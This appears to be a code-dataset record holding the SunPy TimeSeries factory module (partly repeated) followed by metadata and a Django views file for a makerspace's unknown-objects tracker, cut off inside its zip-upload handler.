Arguments args and kwargs are passed through to the validation function and to the constructor for the final type.
For `~sunpy.timeseries.TimeSeries` types, validation function must take a data-header pair as an argument.
Parameters
----------
silence_errors : `bool`, optional
If set, ignore data-header pairs which cause an exception.
Defaults to `False`.
Notes
-----
Extra keyword arguments are passed through to `sunpy.io.read_file` such as `memmap` for FITS files.
"""
(data_header_unit_tuples, data_header_pairs,
already_timeseries, filepaths) = self._parse_args(*args, **kwargs)
new_timeseries = list()
# The filepaths for unreadable files
for filepath in filepaths:
try:
new_ts = self._check_registered_widgets(filepath=filepath, **kwargs)
new_timeseries.append(new_ts)
except (NoMatchError, MultipleMatchError, ValidationFunctionError):
if not silence_errors:
raise
except Exception:
raise
# data_header_pairs is a list of HDUs as read by sunpy.io
# For each set of HDus find the matching class and read the
# data_header_unit_tuples by calling the _parse_hdus method
# of the class.
for pairs in data_header_pairs:
# Pairs may be x long where x is the number of HDUs in the file.
headers = [pair.header for pair in pairs]
types = []
for header in headers:
try:
match = self._get_matching_widget(meta=header, **kwargs)
if not match == GenericTimeSeries:
types.append(match)
except (MultipleMatchError, NoMatchError):
continue
if not types:
# If no specific classes have been found we can read the data
# if we only have one data header pair:
if len(pairs) == 1:
already_timeseries.append(GenericTimeSeries(pairs[0].data,
pairs[0].header))
else:
raise NoMatchError("Input read by sunpy.io can not find a "
"matching class for reading multiple HDUs")
if len(set(types)) > 1:
raise MultipleMatchError("Multiple HDUs return multiple matching classes.")
cls = types[0]
data_header_unit_tuples.append(cls._parse_hdus(pairs))
# Loop over each registered type and check to see if WidgetType
# matches the arguments. If it does, use that type
for triple in data_header_unit_tuples:
data, header, units = triple
# Make a MetaDict from various input types
meta = header
if isinstance(meta, astropy.io.fits.header.Header):
meta = sunpy.io.header.FileHeader(meta)
meta = MetaDict(meta)
try:
new_ts = self._check_registered_widgets(data=data, meta=meta,
units=units, **kwargs)
new_timeseries.append(new_ts)
except (NoMatchError, MultipleMatchError, ValidationFunctionError):
if not silence_errors:
raise
except Exception:
raise
new_timeseries += already_timeseries
# Concatenate the timeseries into one if specified.
concatenate = kwargs.get('concatenate', False)
if concatenate:
# Merge all these timeseries into one.
full_timeseries = new_timeseries.pop(0)
for timeseries in new_timeseries:
full_timeseries = full_timeseries.concatenate(timeseries)
new_timeseries = [full_timeseries]
# Sanitize any units OrderedDict details
for timeseries in new_timeseries:
timeseries._sanitize_units()
# Only return single time series, not in a list if we only have one.
if len(new_timeseries) == 1:
return new_timeseries[0]
return new_timeseries
def _get_matching_widget(self, **kwargs):
candidate_widget_types = list()
for key in self.registry:
# Call the registered validation function for each registered class
if self.registry[key](**kwargs):
candidate_widget_types.append(key)
n_matches = len(candidate_widget_types)
if n_matches == 0:
if self.default_widget_type is None:
raise NoMatchError("No types match specified arguments and no default is set.")
else:
candidate_widget_types = [self.default_widget_type]
elif n_matches > 1:
raise MultipleMatchError("Too many candidate types identified ({0})."
"Specify enough keywords to guarantee unique type "
"identification.".format(n_matches))
# Only one suitable source class is found
return candidate_widget_types[0]
def _check_registered_widgets(self, **kwargs):
"""
Checks the (instrument) source(s) that are compatible with this given
file/data.
Only if exactly one source is compatible will a
`~sunpy.timeseries.TimeSeries` be returned.
"""
WidgetType = self._get_matching_widget(**kwargs)
# Dealing with the fact that timeseries filetypes are less consistent
# (then maps), we use a _parse_file() method embedded into each
# instrument subclass.
filepath = kwargs.pop('filepath', None)
data = kwargs.pop('data', None)
meta = kwargs.pop('meta', None)
units = kwargs.pop('units', None)
if filepath:
data, meta, units = WidgetType._parse_file(filepath)
# Now return a TimeSeries from the given file.
return WidgetType(data, meta, units, **kwargs)
def _apply_result(data_header_pairs, filepaths, result):
read, result = result
if read:
data_header_pairs.append(result)
else:
filepaths.append(result)
return data_header_pairs, filepaths
def _is_url(arg):
try:
urlopen(arg)
except Exception:
return False
return True
class InvalidTimeSeriesInput(ValueError):
"""
Exception to raise when input variable is not a
`~sunpy.timeseries.TimeSeries` instance and does not point to a valid
TimeSeries input file.
"""
class InvalidTimeSeriesType(ValueError):
"""
Exception to raise when an invalid type of timeseries is requested with
`~sunpy.timeseries.TimeSeries`.
"""
class NoTimeSeriesFound(ValueError):
"""
Exception to raise when input does not point to any valid
`~sunpy.timeseries.TimeSeries` or files.
"""
TimeSeries = TimeSeriesFactory(registry=GenericTimeSeries._registry,
default_widget_type=GenericTimeSeries,
additional_validation_functions=['is_datasource_for'])
|
"""
This module provies the `~sunpy.timeseries.TimeSeriesFactory` class.
"""
import os
import copy
import glob
import warnings
from collections import OrderedDict
from urllib.request import urlopen
import numpy as np
import pandas as pd
import astropy
import astropy.io.fits
import astropy.units as u
from astropy.table import Table
from astropy.time import Time
import sunpy
from sunpy.io.file_tools import UnrecognizedFileTypeError, read_file
from sunpy.io.fits import HDPair
from sunpy.io.header import FileHeader
from sunpy.timeseries.timeseriesbase import GenericTimeSeries
from sunpy.util import expand_list
from sunpy.util.config import get_and_create_download_dir
from sunpy.util.datatype_factory_base import (BasicRegistrationFactory, MultipleMatchError,
NoMatchError, ValidationFunctionError)
from sunpy.util.metadata import MetaDict
from sunpy.util.net import download_file
__all__ = ['TimeSeries', 'TimeSeriesFactory', 'NoTimeSeriesFound',
'InvalidTimeSeriesInput', 'InvalidTimeSeriesType']
class TimeSeriesFactory(BasicRegistrationFactory):
"""
TimeSeries(*args, **kwargs)
TimeSeries factory class, used to create a variety of `~sunpy.timeseries.TimeSeries` objects.
Valid timeseries types are specified by registering them with the factory.
Parameters
----------
source : `str`, optional
A string to select the observational source of the data, currently
necessary to define how files should be read for all instruments.
concatenate : `bool`, optional
Defaults to `False`.
If set, combine any resulting list of TimeSeries objects into a single
TimeSeries, using successive concatenate methods.
Examples
--------
>>> import sunpy.timeseries
>>> import sunpy.data.sample # doctest: +REMOTE_DATA
>>> my_timeseries = sunpy.timeseries.TimeSeries(sunpy.data.sample.GOES_XRS_TIMESERIES) # doctest: +REMOTE_DATA
The SunPy TimeSeries factory accepts a wide variety of inputs for creating timeseries
* Preloaded tuples of (data, header) pairs or (data, header, units)
>>> my_timeseries = sunpy.timeseries.TimeSeries((data, header)) # doctest: +SKIP
Headers and units must be either a `dict`, `~collections.OrderedDict` or `~sunpy.util.metadata.MetaDict`.
* data, header pairs, or data, header units triples, not in tuples
>>> my_timeseries = sunpy.timeseries.TimeSeries(data, header) # doctest: +SKIP
>>> my_timeseries = sunpy.timeseries.TimeSeries(data, header, units) # doctest: +SKIP
* File names for files understood by `sunpy.io` and those not
>>> my_timeseries = sunpy.timeseries.TimeSeries('filename.fits') # doctest: +SKIP
>>> my_timeseries = sunpy.timeseries.TimeSeries('filename.fits', source='lyra') # doctest: +SKIP
* Multiple files can be combined into one TimeSeries, as long as they are the same source
>>> my_timeseries = sunpy.timeseries.TimeSeries(['goesfile1.fits', 'goesfile2.fits'],
... concatenate=True) # doctest: +SKIP
* All fits files in a directory by giving a directory
>>> my_timeseries = sunpy.timeseries.TimeSeries('local_dir/sub_dir') # doctest: +SKIP
* Some regex globs
>>> my_timeseries = sunpy.timeseries.TimeSeries('eit_*.fits') # doctest: +SKIP
* URLs
>>> my_timeseries = sunpy.timeseries.TimeSeries(url) # doctest: +SKIP
* Lists of any of the above
>>> my_timeseries = sunpy.timeseries.TimeSeries(['file1.fits', 'file2.fits',
... 'file3.fits', 'directory1/']) # doctest: +SKIP
* Any mixture of the above not in a list
>>> my_timeseries = sunpy.timeseries.TimeSeries((data, header), data2, header2,
... 'file1.fits', url, 'eit_*.fits') # doctest: +SKIP
"""
@staticmethod
def _read_file(fname, **kwargs):
"""
Reading a file with `sunpy.io` for automatic source detection.
Parameters
----------
fname : `str`
The file path to parse.
Returns
-------
parsed : `bool`
`True` if file has been read.
pairs : `list` or `str`
List of ``(data, header)`` pairs if ``parsed`` is `True`, ``fname`` if ``parsed`` is `False`.
`False` if the file is not supported or incorrect.
"""
if 'source' not in kwargs.keys() or not kwargs['source']:
try:
pairs = read_file(fname, **kwargs)
new_pairs = []
for pair in pairs:
filedata, filemeta = pair
if isinstance(filemeta, FileHeader):
data = filedata
meta = MetaDict(filemeta)
new_pairs.append(HDPair(data, meta))
return True, new_pairs
except UnrecognizedFileTypeError:
return False, fname
else:
return False, fname
@staticmethod
def _validate_meta(meta):
"""
Validate a meta argument for use as metadata.
Currently only validates by class.
"""
if isinstance(meta, astropy.io.fits.header.Header):
return True
elif isinstance(meta, sunpy.io.header.FileHeader):
return True
elif isinstance(meta, dict):
return True
else:
return False
@staticmethod
def _validate_units(units):
"""
Validates the astropy unit-information associated with a
`~sunpy.timeseries.TimeSeries`.
Should be a dictionary of some form (but not
`sunpy.util.metadict.MetaDict`) with only `astropy.units` for
values.
"""
warnings.simplefilter('always', Warning)
result = True
# It must be a dictionary
if not isinstance(units, dict) or isinstance(units, MetaDict):
return False
for key in units:
if not isinstance(units[key], u.UnitBase):
# If this is not a unit then this can't be a valid units dict.
return False
# Passed all the tests
return result
@staticmethod
def _from_table(t):
"""
Extract the data, metadata and units from an astropy table for use in
constructing a `~sunpy.timeseries.TimeSeries`.
Parameters
----------
t: `~astropy.table.Table`
The input table. The datetime column must be the first column or the (single) primary key index.
"""
table = copy.deepcopy(t)
# Default the time index to the first column
index_name = table.colnames[0]
# Check if another column is defined as the index/primary_key
if table.primary_key:
# Check there is only one primary_key/index column
if len(table.primary_key) == 1:
table.primary_key[0]
else:
raise ValueError("Invalid input Table, TimeSeries doesn't support conversion"
" of tables with more then one index column.")
# Extract, convert and remove the index column from the input table
index = table[index_name]
# Convert if the index is given as an astropy Time object
if isinstance(index, Time):
index = index.datetime
index = pd.to_datetime(index)
table.remove_column(index_name)
# Extract the column values from the table
data = {}
units = {}
for colname in table.colnames:
data[colname] = table[colname]
units[colname] = table[colname].unit
# Create a dataframe with this and return
df = pd.DataFrame(data=data, index=index)
return df, MetaDict(table.meta), units
def _parse_args(self, *args, **kwargs):
"""
Parses an `args` list for data-header pairs. `args` can contain any mixture of the following
entries:
* tuples of (data, header, unit) (1)
* data, header not in a tuple (1)
* filename, which will be read
* directory, from which all files will be read
* glob, from which all files will be read
* url, which will be downloaded and read
* lists containing any of the above.
(1) header/unit are optional and in either order, but data should be the first entry in each group.
Examples
--------
self._parse_args(data, header,
(data, header),
['file1', 'file2', 'file3'],
'file4',
'directory1',
'*.fits')
"""
data_header_unit_tuples = list()
data_header_pairs = list()
already_timeseries = list()
filepaths = list()
# Account for nested lists of items. Simply outputs a single list of
# items, nested lists are expanded to element level.
args = expand_list(args)
# For each of the arguments, handle each of the cases
i = 0
while i < len(args):
arg = args[i]
# Data-header pair in a tuple
if (isinstance(arg, (np.ndarray, Table, pd.DataFrame))):
# and self._validate_meta(args[i+1])):
# Assume a Pandas Dataframe is given
data = arg
units = OrderedDict()
meta = MetaDict()
# Convert the data argument into a Pandas DataFrame if needed.
if isinstance(data, Table):
# We have an Astropy Table:
data, meta, units = self._from_table(data)
elif isinstance(data, np.ndarray):
# We have a numpy ndarray. We assume the first column is a dt index
data = pd.DataFrame(data=data[:, 1:], index=Time(data[:, 0]))
# If there are 1 or 2 more arguments:
for _ in range(2):
if (len(args) > i+1):
# If that next argument isn't data but is metaddata or units:
if not isinstance(args[i+1], (np.ndarray, Table, pd.DataFrame)):
if self._validate_units(args[i+1]):
units.update(args[i+1])
i += 1 # an extra increment to account for the units
elif self._validate_meta(args[i+1]):
# if we have an astropy.io FITS header then convert
# to preserve multi-line comments
if isinstance(args[i+1], astropy.io.fits.header.Header):
args[i+1] = MetaDict(sunpy.io.header.FileHeader(args[i+1]))
meta.update(args[i+1])
i += 1 # an extra increment to account for the meta
# Add a 3-tuple for this TimeSeries.
data_header_unit_tuples.append((data, meta, units))
# Filepath
elif (isinstance(arg, str) and
os.path.isfile(os.path.expanduser(arg))):
path = os.path.expanduser(arg)
result = self._read_file(path, **kwargs)
data_header_pairs, filepaths = _apply_result(data_header_pairs, filepaths, result)
# Directory
elif (isinstance(arg, str) and
os.path.isdir(os.path.expanduser(arg))):
path = os.path.expanduser(arg)
files = [os.path.join(path, elem) for elem in os.listdir(path)]
for afile in files:
# returns a boolean telling us if it were read and either a
# tuple or the original filepath for reading by a source
result = self._read_file(afile, **kwargs)
data_header_pairs, filepaths = _apply_result(data_header_pairs, filepaths,
result)
# Glob
elif isinstance(arg, str) and '*' in arg:
files = glob.glob(os.path.expanduser(arg))
for afile in files:
# returns a boolean telling us if it were read and either a
# tuple or the original filepath for reading by a source
result = self._read_file(afile, **kwargs)
data_header_pairs, filepaths = _apply_result(data_header_pairs, filepaths,
result)
# Already a TimeSeries
elif isinstance(arg, GenericTimeSeries):
already_timeseries.append(arg)
# A URL
elif (isinstance(arg, str) and
_is_url(arg)):
url = arg
path = download_file(url, get_and_create_download_dir())
result = self._read_file(path, **kwargs)
data_header_pairs, filepaths = _apply_result(data_header_pairs, filepaths, result)
else:
raise NoMatchError("File not found or invalid input")
i += 1
# TODO:
# In the end, if there are already TimeSeries it should be put in the
# same order as the input, currently they are not.
return data_header_unit_tuples, data_header_pairs, already_timeseries, filepaths
def __call__(self, *args, silence_errors=False, **kwargs):
"""
Method for running the factory. Takes arbitrary arguments and keyword
arguments and passes them to a sequence of pre-registered types to
determine which is the correct `~sunpy.timeseries.TimeSeries` source
type to build.
Arguments args and kwargs are passed through to the validation function and to the constructor for the final type.
For `~sunpy.timeseries.TimeSeries` types, validation function must take a data-header pair as an argument.
Parameters
----------
silence_errors : `bool`, optional
If set, ignore data-header pairs which cause an exception.
Defaults to `False`.
Notes
-----
Extra keyword arguments are passed through to `sunpy.io.read_file` such as `memmap` for FITS files.
"""
(data_header_unit_tuples, data_header_pairs,
already_timeseries, filepaths) = self._parse_args(*args, **kwargs)
new_timeseries = list()
# The filepaths for unreadable files
for filepath in filepaths:
try:
new_ts = self._check_registered_widgets(filepath=filepath, **kwargs)
new_timeseries.append(new_ts)
except (NoMatchError, MultipleMatchError, ValidationFunctionError):
if not silence_errors:
raise
except Exception:
raise
# data_header_pairs is a list of HDUs as read by sunpy.io
# For each set of HDus find the matching class and read the
# data_header_unit_tuples by calling the _parse_hdus method
# of the class.
for pairs in data_header_pairs:
# Pairs may be x long where x is the number of HDUs in the file.
headers = [pair.header for pair in pairs]
types = []
for header in headers:
try:
match = self._get_matching_widget(meta=header, **kwargs)
if not match == GenericTimeSeries:
types.append(match)
except (MultipleMatchError, NoMatchError):
continue
if not types:
# If no specific classes have been found we can read the data
# if we only have one data header pair:
if len(pairs) == 1:
already_timeseries.append(GenericTimeSeries(pairs[0].data,
pairs[0].header))
else:
raise NoMatchError("Input read by sunpy.io can not find a "
"matching class for reading multiple HDUs")
if len(set(types)) > 1:
raise MultipleMatchError("Multiple HDUs return multiple matching classes.")
cls = types[0]
data_header_unit_tuples.append(cls._parse_hdus(pairs))
# Loop over each registered type and check to see if WidgetType
# matches the arguments. If it does, use that type
for triple in data_header_unit_tuples:
data, header, units = triple
# Make a MetaDict from various input types
meta = header
if isinstance(meta, astropy.io.fits.header.Header):
meta = sunpy.io.header.FileHeader(meta)
meta = MetaDict(meta)
try:
new_ts = self._check_registered_widgets(data=data, meta=meta,
units=units, **kwargs)
new_timeseries.append(new_ts)
except (NoMatchError, MultipleMatchError, ValidationFunctionError):
if not silence_errors:
raise
except Exception:
raise
new_timeseries += already_timeseries
# Concatenate the timeseries into one if specified.
concatenate = kwargs.get('concatenate', False)
if concatenate:
# Merge all these timeseries into one.
full_timeseries = new_timeseries.pop(0)
for timeseries in new_timeseries:
full_timeseries = full_timeseries.concatenate(timeseries)
new_timeseries = [full_timeseries]
# Sanitize any units OrderedDict details
for timeseries in new_timeseries:
timeseries._sanitize_units()
# Only return single time series, not in a list if we only have one.
if len(new_timeseries) == 1:
return new_timeseries[0]
return new_timeseries
def _get_matching_widget(self, **kwargs):
candidate_widget_types = list()
for key in self.registry:
# Call the registered validation function for each registered class
if self.registry[key](**kwargs):
candidate_widget_types.append(key)
n_matches = len(candidate_widget_types)
if n_matches == 0:
if self.default_widget_type is None:
raise NoMatchError("No types match specified arguments and no default is set.")
else:
candidate_widget_types = [self.default_widget_type]
elif n_matches > 1:
raise MultipleMatchError("Too many candidate types identified ({0})."
"Specify enough keywords to guarantee unique type "
"identification.".format(n_matches))
# Only one suitable source class is found
return candidate_widget_types[0]
def _check_registered_widgets(self, **kwargs):
"""
Checks the (instrument) source(s) that are compatible with this given
file/data.
Only if exactly one source is compatible will a
`~sunpy.timeseries.TimeSeries` be returned.
"""
WidgetType = self._get_matching_widget(**kwargs)
# Dealing with the fact that timeseries filetypes are less consistent
# (then maps), we use a _parse_file() method embedded into each
# instrument subclass.
filepath = kwargs.pop('filepath', None)
data = kwargs.pop('data', None)
meta = kwargs.pop('meta', None)
units = kwargs.pop('units', None)
if filepath:
data, meta, units = WidgetType._parse_file(filepath)
# Now return a TimeSeries from the given file.
return WidgetType(data, meta, units, **kwargs)
def _apply_result(data_header_pairs, filepaths, result):
read, result = result
if read:
data_header_pairs.append(result)
else:
filepaths.append(result)
return data_header_pairs, filepaths
def _is_url(arg):
try:
urlopen(arg)
except Exception:
return False
return True
class InvalidTimeSeriesInput(ValueError):
"""
Exception to raise when input variable is not a
`~sunpy.timeseries.TimeSeries` instance and does not point to a valid
TimeSeries input file.
"""
class InvalidTimeSeriesType(ValueError):
"""
Exception to raise when an invalid type of timeseries is requested with
`~sunpy.timeseries.TimeSeries`.
"""
class NoTimeSeriesFound(ValueError):
"""
Exception to raise when input does not point to any valid
`~sunpy.timeseries.TimeSeries` or files.
"""
TimeSeries = TimeSeriesFactory(registry=GenericTimeSeries._registry,
default_widget_type=GenericTimeSeries,
additional_validation_functions=['is_datasource_for'])
|
en
| 0.712033
|
This module provies the `~sunpy.timeseries.TimeSeriesFactory` class. TimeSeries(*args, **kwargs) TimeSeries factory class, used to create a variety of `~sunpy.timeseries.TimeSeries` objects. Valid timeseries types are specified by registering them with the factory. Parameters ---------- source : `str`, optional A string to select the observational source of the data, currently necessary to define how files should be read for all instruments. concatenate : `bool`, optional Defaults to `False`. If set, combine any resulting list of TimeSeries objects into a single TimeSeries, using successive concatenate methods. Examples -------- >>> import sunpy.timeseries >>> import sunpy.data.sample # doctest: +REMOTE_DATA >>> my_timeseries = sunpy.timeseries.TimeSeries(sunpy.data.sample.GOES_XRS_TIMESERIES) # doctest: +REMOTE_DATA The SunPy TimeSeries factory accepts a wide variety of inputs for creating timeseries * Preloaded tuples of (data, header) pairs or (data, header, units) >>> my_timeseries = sunpy.timeseries.TimeSeries((data, header)) # doctest: +SKIP Headers and units must be either a `dict`, `~collections.OrderedDict` or `~sunpy.util.metadata.MetaDict`. * data, header pairs, or data, header units triples, not in tuples >>> my_timeseries = sunpy.timeseries.TimeSeries(data, header) # doctest: +SKIP >>> my_timeseries = sunpy.timeseries.TimeSeries(data, header, units) # doctest: +SKIP * File names for files understood by `sunpy.io` and those not >>> my_timeseries = sunpy.timeseries.TimeSeries('filename.fits') # doctest: +SKIP >>> my_timeseries = sunpy.timeseries.TimeSeries('filename.fits', source='lyra') # doctest: +SKIP * Multiple files can be combined into one TimeSeries, as long as they are the same source >>> my_timeseries = sunpy.timeseries.TimeSeries(['goesfile1.fits', 'goesfile2.fits'], ... concatenate=True) # doctest: +SKIP * All fits files in a directory by giving a directory >>> my_timeseries = sunpy.timeseries.TimeSeries('local_dir/sub_dir') # doctest: +SKIP * Some regex globs >>> my_timeseries = sunpy.timeseries.TimeSeries('eit_*.fits') # doctest: +SKIP * URLs >>> my_timeseries = sunpy.timeseries.TimeSeries(url) # doctest: +SKIP * Lists of any of the above >>> my_timeseries = sunpy.timeseries.TimeSeries(['file1.fits', 'file2.fits', ... 'file3.fits', 'directory1/']) # doctest: +SKIP * Any mixture of the above not in a list >>> my_timeseries = sunpy.timeseries.TimeSeries((data, header), data2, header2, ... 'file1.fits', url, 'eit_*.fits') # doctest: +SKIP Reading a file with `sunpy.io` for automatic source detection. Parameters ---------- fname : `str` The file path to parse. Returns ------- parsed : `bool` `True` if file has been read. pairs : `list` or `str` List of ``(data, header)`` pairs if ``parsed`` is `True`, ``fname`` if ``parsed`` is `False`. `False` if the file is not supported or incorrect. Validate a meta argument for use as metadata. Currently only validates by class. Validates the astropy unit-information associated with a `~sunpy.timeseries.TimeSeries`. Should be a dictionary of some form (but not `sunpy.util.metadict.MetaDict`) with only `astropy.units` for values. # It must be a dictionary # If this is not a unit then this can't be a valid units dict. # Passed all the tests Extract the data, metadata and units from an astropy table for use in constructing a `~sunpy.timeseries.TimeSeries`. Parameters ---------- t: `~astropy.table.Table` The input table. The datetime column must be the first column or the (single) primary key index. # Default the time index to the first column # Check if another column is defined as the index/primary_key # Check there is only one primary_key/index column # Extract, convert and remove the index column from the input table # Convert if the index is given as an astropy Time object # Extract the column values from the table # Create a dataframe with this and return Parses an `args` list for data-header pairs. `args` can contain any mixture of the following entries: * tuples of (data, header, unit) (1) * data, header not in a tuple (1) * filename, which will be read * directory, from which all files will be read * glob, from which all files will be read * url, which will be downloaded and read * lists containing any of the above. (1) header/unit are optional and in either order, but data should be the first entry in each group. Examples -------- self._parse_args(data, header, (data, header), ['file1', 'file2', 'file3'], 'file4', 'directory1', '*.fits') # Account for nested lists of items. Simply outputs a single list of # items, nested lists are expanded to element level. # For each of the arguments, handle each of the cases # Data-header pair in a tuple # and self._validate_meta(args[i+1])): # Assume a Pandas Dataframe is given # Convert the data argument into a Pandas DataFrame if needed. # We have an Astropy Table: # We have a numpy ndarray. We assume the first column is a dt index # If there are 1 or 2 more arguments: # If that next argument isn't data but is metaddata or units: # an extra increment to account for the units # if we have an astropy.io FITS header then convert # to preserve multi-line comments # an extra increment to account for the meta # Add a 3-tuple for this TimeSeries. # Filepath # Directory # returns a boolean telling us if it were read and either a # tuple or the original filepath for reading by a source # Glob # returns a boolean telling us if it were read and either a # tuple or the original filepath for reading by a source # Already a TimeSeries # A URL # TODO: # In the end, if there are already TimeSeries it should be put in the # same order as the input, currently they are not. Method for running the factory. Takes arbitrary arguments and keyword arguments and passes them to a sequence of pre-registered types to determine which is the correct `~sunpy.timeseries.TimeSeries` source type to build. Arguments args and kwargs are passed through to the validation function and to the constructor for the final type. For `~sunpy.timeseries.TimeSeries` types, validation function must take a data-header pair as an argument. Parameters ---------- silence_errors : `bool`, optional If set, ignore data-header pairs which cause an exception. Defaults to `False`. Notes ----- Extra keyword arguments are passed through to `sunpy.io.read_file` such as `memmap` for FITS files. # The filepaths for unreadable files # data_header_pairs is a list of HDUs as read by sunpy.io # For each set of HDus find the matching class and read the # data_header_unit_tuples by calling the _parse_hdus method # of the class. # Pairs may be x long where x is the number of HDUs in the file. # If no specific classes have been found we can read the data # if we only have one data header pair: # Loop over each registered type and check to see if WidgetType # matches the arguments. If it does, use that type # Make a MetaDict from various input types # Concatenate the timeseries into one if specified. # Merge all these timeseries into one. # Sanitize any units OrderedDict details # Only return single time series, not in a list if we only have one. # Call the registered validation function for each registered class # Only one suitable source class is found Checks the (instrument) source(s) that are compatible with this given file/data. Only if exactly one source is compatible will a `~sunpy.timeseries.TimeSeries` be returned. # Dealing with the fact that timeseries filetypes are less consistent # (then maps), we use a _parse_file() method embedded into each # instrument subclass. # Now return a TimeSeries from the given file. Exception to raise when input variable is not a `~sunpy.timeseries.TimeSeries` instance and does not point to a valid TimeSeries input file. Exception to raise when an invalid type of timeseries is requested with `~sunpy.timeseries.TimeSeries`. Exception to raise when input does not point to any valid `~sunpy.timeseries.TimeSeries` or files.
| 2.375304
| 2
|
ufo/views.py
|
leonrenkema/makerspaceleiden-crm
| 0
|
6628547
|
from django.shortcuts import render
from django.contrib.sites.shortcuts import get_current_site
from django.contrib.admin.sites import AdminSite
from django.template import loader
from django.http import HttpResponse
from django.conf import settings
from django.shortcuts import redirect
from django.views.generic import ListView, CreateView, UpdateView
from django.contrib.auth.decorators import login_required
from django import forms
from django.contrib.auth import login, authenticate
from django.shortcuts import render, redirect
from django.contrib.auth.tokens import PasswordResetTokenGenerator
from django.shortcuts import render
from django.views.decorators.csrf import csrf_protect
from django.db.models import Q
from simple_history.admin import SimpleHistoryAdmin
from django.template.loader import render_to_string, get_template
from django.core.mail import EmailMessage
from django.conf import settings
from django.contrib.admin.sites import AdminSite
from django.core.exceptions import ObjectDoesNotExist
from django.core.mail import EmailMultiAlternatives
from django.urls import reverse
from email.mime.text import MIMEText
from email.mime.image import MIMEImage
from email.mime.multipart import MIMEMultipart
from ufo.utils import emailUfoInfo
import datetime
import uuid
import zipfile
import os
import re
import logging
logger = logging.getLogger(__name__)
from .models import Ufo
from .admin import UfoAdmin
from .forms import UfoForm, NewUfoForm, UfoZipUploadForm
from members.models import User
# Note - we do this here; rather than in the model its save() - as this
# lets admins change things through the database interface silently.
# Which can help when sheparding the community.
#
def alertOwnersToChange(items, userThatMadeTheChange=None, toinform=[]):
context = {
"user": userThatMadeTheChange,
"base": settings.BASE,
}
if userThatMadeTheChange:
toinform.append(userThatMadeTheChange.email)
if settings.ALSO_INFORM_EMAIL_ADDRESSES:
toinform.extend(settings.ALSO_INFORM_EMAIL_ADDRESSES)
return emailUfoInfo(items, "email_notification", toinform=[], context={})
def ufo_redirect(pk=None):
url = reverse("ufo")
if pk:
url = "{}#{}".format(url, pk)
return redirect(url)
def index(request, days=30):
lst = Ufo.objects.all()
if days > 0:
tooOld = datetime.date.today() - datetime.timedelta(days=days)
lst = lst.filter(Q(lastChange__gte=tooOld) | Q(state="UNK"))
context = {
"title": "Uknown Floating Objects",
"lst": lst,
"days": days,
"has_permission": request.user.is_authenticated,
}
return render(request, "ufo/index.html", context)
@login_required
def create(request):
form = NewUfoForm(request.POST or None, request.FILES, initial={"state": "UNK"})
if form.is_valid():
try:
item = form.save(commit=False)
item.state = "UNK"
if not item.description:
item.description = "Added by {}".format(request.user)
item.changeReason = "Created by {} through the self-service portal.".format(
request.user
)
item.save()
alertOwnersToChange(item, request.user, [item.owner.email])
return ufo_redirect(item.id)
except Exception as e:
logger.error(
"Unexpected error during initial save of new ufo: {}".format(e)
)
return HttpResponse(
"Something went wrong ??", status=500, content_type="text/plain"
)
context = {
"title": "Add an Uknown Floating Objects",
"form": form,
"action": "Add",
"has_permission": request.user.is_authenticated,
}
return render(request, "ufo/crud.html", context)
def show(request, pk):
try:
item = Ufo.objects.get(pk=pk)
except ObjectDoesNotExist as e:
return HttpResponse("UFO not found", status=404, content_type="text/plain")
context = {
"title": "Uknown Floating Objects",
"item": item,
"has_permission": request.user.is_authenticated,
}
return render(request, "ufo/view.html", context)
@login_required
def modify(request, pk):
try:
oitem = Ufo.objects.get(pk=pk)
except ObjectDoesNotExist as e:
return HttpResponse("UFO not found", status=404, content_type="text/plain")
toinform = []
if oitem.owner:
toinform.append(oitem.owner.email)
context = {
"title": "Update an Uknown Floating Objects",
"action": "Update",
"item": oitem,
"has_permission": request.user.is_authenticated,
}
if request.POST:
form = UfoForm(request.POST or None, request.FILES, instance=oitem)
if form.is_valid() and request.POST:
try:
item = form.save(commit=False)
item.changeReason = "Changed by {} via self service portal".format(
request.user
)
item.save()
except Exception as e:
logger.error("Unexpected error during update of ufo: {}".format(e))
if item.owner:
toinform.append(item.owner.email)
alertOwnersToChange([item], request.user, toinform)
context["item"] = item
return ufo_redirect(pk)
form = UfoForm(instance=oitem)
context["form"] = form
return render(request, "ufo/crud.html", context)
@login_required
def mine(request, pk):
try:
item = Ufo.objects.get(pk=pk)
except ObjectDoesNotExist as e:
return HttpResponse("UFO not found", status=404, content_type="text/plain")
item.changeReason = "claimed as 'mine' by {} via self service portal".format(
request.user
)
if item.owner != request.user:
alertOwnersToChange([item], request.user, [item.owner.email])
item.save()
return ufo_redirect(pk)
@login_required
# Limit this to admins ?
def delete(request, pk):
try:
item = Ufo.objects.get(pk=pk)
except ObjectDoesNotExist as e:
return HttpResponse("UFO not found", status=404, content_type="text/plain")
form = UfoForm(request.POST or None, instance=item)
for f in form.fields:
form.fields[f].disabled = True
if not request.POST:
context = {
"title": "Confirm delete of this UFO",
"label": "Confirm delete of this UFO",
"action": "Delete",
"is_logged_in": request.user.is_authenticated,
"user": request.user,
"form": form,
"item": item,
"delete": True,
}
return render(request, "ufo/crud.html", context)
if not form.is_valid():
return HttpResponse("Eh - confused ?!", status=403, content_type="text/plain")
try:
item.changeReason = "Deleted via the self-service interface by {0}".format(
request.user
)
item.save()
item.delete()
except Exception as e:
logger.error("Unexpected error during delete of item: {0}".format(e))
return HttpResponse("Box fail", status=400, content_type="text/plain")
return ufo_redirect()
@login_required
def upload_zip(request):
form = UfoZipUploadForm(request.POST or None, request.FILES)
if request.method == "POST":
if form.is_valid() and "zipfile" in request.FILES:
if request.FILES["zipfile"].size > settings.MAX_ZIPFILE:
return HttpResponse(
"Upload too large", status=500, content_type="text/plain"
)
tmpZip = settings.MEDIA_ROOT + "/ufozip-" + str(uuid.uuid4())
with open(tmpZip, "wb+") as dst:
for c in request.FILES["zipfile"].chunks():
dst.write(c)
skipped = []
lst = []
with zipfile.ZipFile(tmpZip, "r") as z:
for zi in z.infolist():
if zi.is_dir():
skipped.append("{0}: skipped, directory".format(f))
continue
f = zi.filename
if re.match("\..*", f):
skipped.append("{0}: skipped, hidden file".format(f))
continue
if re.match(".*/\.", f):
skipped.append("{0}: skipped, hidden file".format(f))
continue
if zi.file_size < settings.MIN_IMAGE_SIZE:
skipped.append("{0}: skipped, too small".format(f))
continue
if zi.file_size > settings.MAX_IMAGE_SIZE:
skipped.append("{0}: skipped, too large".format(f))
continue
extension = "raw"
if re.match(".*\.(jpg|jpeg)$", f, re.IGNORECASE):
extension = "jpg"
elif re.match(".*\.(png)$", f, re.IGNORECASE):
extension = "png"
else:
skipped.append(
